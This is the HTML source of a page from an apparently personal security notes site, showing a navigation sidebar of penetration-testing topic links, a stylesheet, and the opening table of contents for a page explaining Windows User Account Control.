336 lines
42 KiB
HTML
336 lines
42 KiB
HTML
<!doctype html>
|
|
<html lang="en">
|
|
<center>
|
|
<head>
|
|
|
|
|
|
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
|
|
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
|
|
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/search.js"></script>
|
|
<link rel="stylesheet" href="/static/stylesheet.css">
|
|
<link rel="stylesheet" href="/static/auto-complete.css">
|
|
<br>
|
|
<title>The Real Hugo</title>
|
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
|
|
|
|
</head>
|
|
<body>
|
|
<!-- topmenu -->
|
|
<div class="menu">
|
|
<a href="/" style="text-decoration:none">Husk</a>
|
|
</div>
|
|
<div class="search-container">
|
|
<label for="search-by"><i class="fas fa-search"></i></label>
|
|
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
|
|
<!--button type="submit"><i class="search"></i>🔍</button>-->
|
|
<span data-search-clear=""><i class="fas fa-times"></i></span>
|
|
</div>
|
|
|
|
</div>
|
|
<div class="menu">
|
|
</div>
|
|
<!--br><br-->
|
|
</center>
|
|
<p></p>
|
|
<div class="columns">
|
|
<!-- Sidebar -->
|
|
<div class="column column-1">
|
|
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=Portable Executables ontoggle="linkClick(this); return false;" ><summary>Portable Executables</summary><ul><li><a href="/exploit/windows/Portable Executables/Shellcode.html">Shellcode</a></li></ul></details><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul><li><a href="/hashes/bruteforce/patator.html">patator</a></li></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/Signature-Evasion.html">Signature-Evasion</a></li><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/reverse engineering/windows/portable-executable.html">portable-executable</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details>
|
|
</ul>
|
|
</div>
|
|
<div class="column column-2">
|
|
<span class="body">
|
|
<style>pre { line-height: 125%; }
|
|
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
.codehilite .hll { background-color: #2C3B41 }
|
|
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
|
|
.codehilite .err { color: #FF5370 } /* Error */
|
|
.codehilite .esc { color: #89DDFF } /* Escape */
|
|
.codehilite .g { color: #EEFFFF } /* Generic */
|
|
.codehilite .k { color: #BB80B3 } /* Keyword */
|
|
.codehilite .l { color: #C3E88D } /* Literal */
|
|
.codehilite .n { color: #EEFFFF } /* Name */
|
|
.codehilite .o { color: #89DDFF } /* Operator */
|
|
.codehilite .p { color: #89DDFF } /* Punctuation */
|
|
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
|
|
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
|
|
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
|
|
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
|
|
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
|
|
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
|
|
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
|
|
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
|
|
.codehilite .gr { color: #FF5370 } /* Generic.Error */
|
|
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
|
|
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
|
|
.codehilite .go { color: #546E7A } /* Generic.Output */
|
|
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
|
|
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
|
|
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
|
|
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
|
|
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
|
|
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
|
|
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
|
|
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
|
|
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
|
|
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
|
|
.codehilite .ld { color: #C3E88D } /* Literal.Date */
|
|
.codehilite .m { color: #F78C6C } /* Literal.Number */
|
|
.codehilite .s { color: #C3E88D } /* Literal.String */
|
|
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
|
|
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
|
|
.codehilite .nc { color: #FFCB6B } /* Name.Class */
|
|
.codehilite .no { color: #EEFFFF } /* Name.Constant */
|
|
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
|
|
.codehilite .ni { color: #89DDFF } /* Name.Entity */
|
|
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
|
|
.codehilite .nf { color: #82AAFF } /* Name.Function */
|
|
.codehilite .nl { color: #82AAFF } /* Name.Label */
|
|
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
|
|
.codehilite .nx { color: #EEFFFF } /* Name.Other */
|
|
.codehilite .py { color: #FFCB6B } /* Name.Property */
|
|
.codehilite .nt { color: #FF5370 } /* Name.Tag */
|
|
.codehilite .nv { color: #89DDFF } /* Name.Variable */
|
|
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
|
|
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
|
|
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
|
|
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
|
|
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
|
|
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
|
|
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
|
|
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
|
|
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
|
|
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
|
|
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
|
|
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
|
|
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
|
|
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
|
|
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
|
|
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
|
|
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
|
|
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
|
|
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
|
|
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
|
|
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
|
|
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
|
|
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
|
|
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
|
|
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
|
|
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
|
|
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
|
|
<div class="column column-3">
|
|
<ul>
|
|
<li><a href="#user-account-control">User Account Control</a><ul>
|
|
<li><a href="#login-tokens">Login Tokens</a></li>
|
|
<li><a href="#user-account-control-settings">User Account Control Settings</a></li>
|
|
<li><a href="#how-uac-works">How UAC Works</a></li>
|
|
